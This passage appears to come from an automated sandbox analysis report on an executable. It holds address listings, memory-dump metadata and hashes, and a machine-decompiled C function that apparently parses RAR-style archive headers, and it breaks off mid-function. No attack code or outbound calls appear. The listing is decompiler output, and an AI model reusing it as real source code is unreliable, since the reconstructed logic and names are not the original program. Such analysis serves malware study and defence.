              0x00d9cf22
              0x00d9cf22
              0x00000000
              0x00d9cf0a
              0x00d9cef4
              0x00d9ceca
              0x00d9cecc
              0x00d9ced2
              0x00d9ced8
              0x00d9ced9
              0x00000000
              0x00d9ced9
              0x00d9cec8
              0x00d9ce16
              0x00d9ce16
              0x00d9ce1c
              0x00d9ce1e
              0x00d9ce33
              0x00d9ce36
              0x00000000
              0x00d9ce3c
              0x00d9ce3c
              0x00d9ce43
              0x00000000
              0x00d9ce49
              0x00d9ce4f
              0x00d9ce51
              0x00d9ce57
              0x00d9ce57
              0x00d9ce59
              0x00d9ce59
              0x00d9ce5b
              0x00d9ce64
              0x00d9ce6b
              0x00d9ce6e
              0x00d9ce6f
              0x00d9ce71
              0x00d9ce71
              0x00d9cf2a
              0x00d9cf2a
              0x00d9cf2c
              0x00000000
              0x00d9cf32
              0x00d9cf32
              0x00d9cf38
              0x00d9cf3b
              0x00d9ce7e
              0x00d9ce85
              0x00000000
              0x00d9cf41
              0x00d9cf43
              0x00d9cf49
              0x00d9cf4f
              0x00d9cf50
              0x00d9d147
              0x00d9d147
              0x00d9d14e
              0x00d9d14f
              0x00d9d150
              0x00d9d155
              0x00d9d158
              0x00d9d158
              0x00d9cf3b
              0x00d9cf2c
              0x00d9ce43
              0x00d9ce20
              0x00d9ce20
              0x00d9ce22
              0x00d9ce28
              0x00d9d0d2
              0x00d9d0d2
              0x00d9d0d3
              0x00d9d0d9
              0x00d9d0d9
              0x00d9d0e0
              0x00d9d0e1
              0x00d9d0e2
              0x00d9d0e7
              0x00d9d0ea
              0x00d9d0ea
              0x00d9d0ea
              0x00d9ce1e
              0x00d9d0ec
              0x00d9d0ec
              0x00d9d0ee
              0x00d9d15c
              0x00d9d163
              0x00d9d163
              0x00d9d163
              0x00d9d16a
              0x00d9d16c
              0x00d9d172
              0x00d9d173
              0x00d9d61f
              0x00d9d61f
              0x00d9d620
              0x00d9d621
              0x00d9d626
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9d0f0
              0x00d9d0f6
              0x00d9d0f6
              0x00d9d0fc
              0x00d9d0fc
              0x00d9d108
              0x00000000
              0x00d9d108
              0x00d9cd97
              0x00d9d629
              0x00d9d629
              0x00d9d62f
              0x00d9d631
              0x00d9d637
              0x00d9d63d
              0x00d9d63f
              0x00d9d641
              0x00d9d643
              0x00d9d643
              0x00d9d645
              0x00d9d645
              0x00d9d64e
              0x00d9d64f
              0x00d9d653
              0x00d9d65a
              0x00d9d65d
              0x00d9d65e
              0x00d9d660
              0x00d9d660
              0x00d9d664
              0x00d9d66a
              0x00d9d66c
              0x00d9d672
              0x00d9d674
              0x00d9d67a
              0x00d9d67d
              0x00d9d690
              0x00d9d693
              0x00d9d699
              0x00d9d6ae
              0x00d9d6b3
              0x00d9d67f
              0x00d9d681
              0x00d9d688
              0x00d9d688
              0x00d9d67d
              0x00d9d6b6
              0x00d9d6b6
              0x00d9d6c6
              0x00d9d6cf
              0x00d9d6d0
              0x00d9d6d2
              0x00d9d769
              0x00d9d76b
              0x00d9d776
              0x00d9d776
              0x00d9d778
              0x00d9d77b
              0x00d9d77d
              0x00000000
              0x00d9d76d
              0x00d9d773
              0x00d9d773
              0x00d9d6d8
              0x00d9d6d8
              0x00d9d6de
              0x00d9d6e1
              0x00d9d6e7
              0x00d9d6ea
              0x00d9d6f0
              0x00d9d6f2
              0x00d9d6f8
              0x00d9d6fa
              0x00d9d6fc
              0x00d9d6fc
              0x00d9d6fe
              0x00d9d6fe
              0x00d9d70b
              0x00d9d712
              0x00d9d715
              0x00d9d716
              0x00d9d718
              0x00d9d719
              0x00d9d719
              0x00d9d71d
              0x00d9d723
              0x00d9d725
              0x00d9d727
              0x00d9d72d
              0x00d9d730
              0x00d9d744
              0x00d9d74a
              0x00d9d75f
              0x00d9d764
              0x00d9d732
              0x00d9d732
              0x00d9d739
              0x00d9d739
              0x00d9d730
              0x00d9d725
              0x00d9d783
              0x00d9d783
              0x00d9d783
              0x00d9d78f
              0x00d9d792
              0x00d9d798
              0x00d9d79a
              0x00d9d79c
              0x00d9d7a2
              0x00d9d7a4
              0x00d9d7a4
              0x00d9d7a4
              0x00d9d7a2
              0x00d9d7a9
              0x00d9d7aa
              0x00d9d7ac
              0x00d9d7ae
              0x00d9d7ae
              0x00d9d7b0
              0x00d9d7b6
              0x00d9d7bc
              0x00d9d7be
              0x00d9d7c4
              0x00d9d7c4
              0x00d9d7ca
              0x00d9d7cc
              0x00000000
              0x00000000
              0x00d9d7d2
              0x00d9d7d4
              0x00d9d7d6
              0x00d9d7d6
              0x00d9d7d8
              0x00d9d7d8
              0x00d9d7e8
              0x00d9d7ef
              0x00d9d7f2
              0x00d9d7f3
              0x00d9d7f5
              0x00d9d7f5
              0x00d9d7f9
              0x00d9d7ff
              0x00d9d801
              0x00d9d803
              0x00d9d809
              0x00d9d80c
              0x00d9d81d
              0x00d9d820
              0x00d9d826
              0x00d9d83b
              0x00d9d840
              0x00d9d80e
              0x00d9d80e
              0x00d9d815
              0x00d9d815
              0x00d9d80c
              0x00d9d851
              0x00d9d860
              0x00d9d861
              0x00d9d861
              0x00d9d863
              0x00d9d865
              0x00d9d865
              0x00d9d86b
              0x00d9d86e
              0x00d9d870
              0x00d9d872
              0x00d9d872
              0x00d9d875
              0x00d9d876
              0x00d9d876
              0x00d9d87b
              0x00d9d87e
              0x00d9d882
              0x00d9d882
              0x00d9d883
              0x00d9d885
              0x00d9d88b
              0x00d9d891
              0x00000000
              0x00000000
              0x00000000
              0x00d9d891
              0x00d9d7c4
              0x00d9d897
              0x00d9d897
              0x00000000
              0x00d9d897
              0x00d9c61c
              0x00d9c613
              0x00d9c60a
              0x00d9c5c1
              0x00d9c5c5
              0x00d9c5cd
              0x00000000
              0x00d9c5cf
              0x00d9c5d5
              0x00d9c5da
              0x00d9d8b6
              0x00d9d8b6
              0x00d9d8b9
              0x00d9d8c4
              0x00d9d8ef
              0x00d9d8f0
              0x00d9d8f1
              0x00d9d8f2
              0x00d9d8f3
              0x00d9d8f4
              0x00d9d8f9
              0x00d9d901
              0x00d9d906
              0x00d9d90c
              0x00d9d911
              0x00d9d912
              0x00d9d912
              0x00d9d912
              0x00d9d918
              0x00d9d919
              0x00d9d919
              0x00d9d91c
              0x00d9d922
              0x00000000
              0x00000000
              0x00d9d924
              0x00d9d929
              0x00d9d92c
              0x00d9d92e
              0x00d9d936
              0x00d9d938
              0x00d9d93a
              0x00d9d93f
              0x00d9d942
              0x00d9d948
              0x00d9d94b
              0x00d9d94d
              0x00d9d94d
              0x00d9d94d
              0x00d9d94d
              0x00d9d94b
              0x00d9d950
              0x00d9d95c
              0x00d9d962
              0x00d9d96a
              0x00d9d96f
              0x00d9d970
              0x00d9d975
              0x00d9d975
              0x00d9d975
              0x00d9d975
              0x00d9d979
              0x00d9d979
              0x00d9d97c
              0x00d9d983
              0x00d9d990
              0x00d9d8c6
              0x00d9d8c6
              0x00d9d8c6
              0x00d9d8d0
              0x00d9d8d9
              0x00d9d8de
              0x00d9d8ec
              0x00d9d8ec
              0x00d9d8c4
              0x00d9c5cd

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: c6e5ecb0e6f71e13348221d376de561f8af9d7f301659bdd952508117c4a005e
              • Instruction ID: 19db0608edefcde8123232da69eedee0386d6c969e3c0521b5798b5562fbd3b2
              • Opcode Fuzzy Hash: c6e5ecb0e6f71e13348221d376de561f8af9d7f301659bdd952508117c4a005e
              • Instruction Fuzzy Hash: B4C23972E186288FDF25CE28DD407EAB7B6EB45305F1941EAD44DE7240E774AE818F60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D72692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 93%
              			E00D72692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E00D8D870(E00DA1197, _t698);
				E00D8D940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E00D7C223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E00D7C42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E00D7C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E00D7C251(_t698 + 0x24) & 0x000000ff;
						_t333 = E00D7C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E00D7C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E00D7C42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E00D71901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E00D7A96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E00D7C269(_t698 + 0x24);
										_t638 = E00D7C29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E00D7C34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E00D76E03(0xdb00e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00D76BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E00D7972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E00D7C29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E00D7A8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E00D7C29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E00D7C29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E00D7C251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E00D7C29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E00D7C29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E00D7C251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E00D7C251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E00D7C269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E00D7C29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E00D7C300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E00D80FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E00D71EDE(_t685 + 0x1028, _t671);
																		_t466 = E00D7C300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E00D92B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E00D7F749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E00D8D890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E00D7F749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E00D92B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E00D769E0(_t698);
																		_t484 = E00D92BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E00D769F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E00D7F79F();
																	}
																	E00D71F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E00D7C300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E00D808B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E00D73CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E00D7C34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E00D76E03(0xdb00e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E00D76BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E00D7C269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E00D808B2(E00D7C29E(_t698 + 0x24));
																		}
																		E00D806E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E00D80910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E00D7C251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E00D7C29E(_t698 + 0x24);
															_t491 = E00D7C29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
